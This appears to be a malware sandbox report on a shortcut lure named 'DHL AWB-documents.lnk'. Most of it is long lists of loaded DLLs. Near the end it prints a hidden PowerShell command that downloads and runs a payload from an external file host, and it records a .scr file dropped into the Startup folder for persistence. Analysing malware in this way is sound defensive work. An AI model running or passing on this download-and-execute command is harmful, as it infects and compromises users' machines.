Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: DHL AWB-documents.lnk

LNK file: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior

Source: setup_x86.exe.0.dr

Static PE information: 0xF5959D04 [Sun Jul 25 18:23:00 2100 UTC]

Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D49D0 push esi; retf 5F55h	3_2_00007FFD348D5A37
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348C0D32 push eax; retn 347Bh	3_2_00007FFD348C0E11
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348C00BD pushad ; iretd	3_2_00007FFD348C00C1
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD348D739F push esi; retf	3_2_00007FFD348D73A7
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A92F60 push esp; retf 4810h	3_2_00007FFD34A9318C
Source: C:\Users\user\Downloads\setup_x86.exe	Code function: 3_2_00007FFD34A8B20C pushad ; ret	3_2_00007FFD34A8B20D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD3476D2A5 pushad ; iretd	4_2_00007FFD3476D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD34952316 push 8B485F95h; iretd	4_2_00007FFD3495231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD348A19BB pushad ; ret	8_2_00007FFD348A19C9

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Downloads\setup_x86.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr

Jump to dropped file

Source: C:\Users\user\Downloads\setup_x86.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr			Jump to dropped file
